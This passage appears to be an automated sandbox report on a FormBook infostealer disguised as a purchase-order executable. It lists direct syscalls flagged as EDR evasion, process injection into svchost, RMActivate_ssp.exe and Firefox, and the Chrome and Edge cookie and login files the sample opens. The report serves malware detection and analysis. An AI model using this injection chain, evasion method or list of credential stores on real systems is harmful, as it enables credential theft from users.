            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]2_2_03B6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]2_2_03B6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]2_2_03B5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]2_2_03BBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h]2_2_03BDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03BBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]2_2_03B649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03BFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]2_2_03BC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04940 mov eax, dword ptr fs:[00000030h]2_2_03C04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]2_2_03BB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]2_2_03BC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]2_2_03BBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]2_2_03BBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]2_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h]2_2_03C008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]2_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]2_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ABA937 GetProcessHeap,0_2_00ABA937
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AB8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AB8E3C
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AB8E19 SetUnhandledExceptionFilter,0_2_00AB8E19

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeThread register set: target process: 5792Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeThread APC queued: target process: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30CF008Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ACBE95 LogonUserW,0_2_00ACBE95
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00A9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_00A9374E
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AD4B52 SendInput,keybd_event,0_2_00AD4B52
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AD7DD5 mouse_event,0_2_00AD7DD5
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"Jump to behavior
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ACB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00ACB398
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ACBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00ACBE31
            Source: CjeBlighAyoJst.exe, 00000003.00000002.3887405886.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000000.2158082247.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318062748.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: Purchase Order TE- 00011-7777.exe, CjeBlighAyoJst.exe, 00000003.00000002.3887405886.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000000.2158082247.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318062748.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmannailWindowifyAnimation Target0
            Source: CjeBlighAyoJst.exe, 00000003.00000002.3887405886.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000000.2158082247.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318062748.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: Purchase Order TE- 00011-7777.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: CjeBlighAyoJst.exe, 00000003.00000002.3887405886.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000000.2158082247.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318062748.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AB7254 cpuid 0_2_00AB7254
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AB40DA GetSystemTimeAsFileTime,__aulldiv,0_2_00AB40DA
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00B0C146 GetUserNameW,0_2_00B0C146
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AC2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00AC2C3C
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AAE47B

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
